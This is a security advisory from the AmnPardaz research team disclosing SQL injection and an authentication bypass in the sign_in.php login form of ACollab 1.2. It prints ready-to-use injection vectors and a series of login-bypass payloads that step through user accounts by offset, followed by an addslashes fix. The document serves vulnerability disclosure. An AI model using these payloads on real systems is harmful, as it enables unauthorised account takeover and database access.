|
##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title:=09=09ACollab Multiple Vulnerabilities # Vendor:=09=09http://www.atutor.ca/acollab # Vulnerable Version:=091.2 (Latest version till now) # Exploitation:=09=09Remote with browser # Fix:=09=09=09=09=09N/A ################################################################################### #################### - Description: #################### ACollab as described by its vendor is an accessible, open source, multi-group, Web-based collaborative work environment. ACollab is available as a standalone collaborative work environment that will run on its own. ACollab is ideal for groups working at a distance developing documentation, collaborating on research, or writing joint papers. #################### - Vulnerability: #################### +--> SQL Injection =09All of the parameters are sanitized correctly before being used in SQL queries else of =09the POST parameters 'login' and 'password' in the "sign_in.php" page. These parameters =09can be used for injecting arbitrary SQL queries; the 'login' parameter is single quoted =09and the 'password' parameter is single parenthesized, single quoted. +--> Authentication Bypass =09The ACollab CMS uses two mechanism for authentication. One for master admin user which is =09based on a hard coded username/password initialized in the installation process. And a DB-based =09authentication for all other users, including the group administrators which can add/remove/edit =09all posts and news and ... from forums and first screen of the website. The second authentication =09mechanism can be bypassed. #################### - Exploits/PoCs: #################### +--> Exploiting The (MySQL) SQL Injection Vulnerability: =09Go to the sign in page at "victim.net/ACollab/sign_in.php" and use the following vectors for injecting =09your desired SQL query, namely $Q: =09 - In the Username field (login POST parameter): ' or $Q or ''=' =09 - In the Password field (password POST parameter): ') or $Q or (''=' +--> Exploiting The Authentication Bypass Vulnerability: =09You can login as anyone of the registered users of ACollab CMS by providing following vector =09as username and nothing as password: =09 'or''='' limit 1 offset 0 -- ' =09Above vector will log you as the first user according to its member id order. You can login as other =09users, searching for a group administrator account, by following vectors: =09 'or''='' limit 1 offset 0 -- ' =09 'or''='' limit 1 offset 1 -- ' =09 'or''='' limit 1 offset 2 -- ' =09 .... #################### - Solution: #################### Add the following command $_POST['login'] = addslashes ($_POST['login']); $_POST['password'] = addslashes ($_POST['password']); at the line 46 of 'sign_in.php' file. #################### - Original Advisory: #################### http://www.bugreport.ir/index_72.htm #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com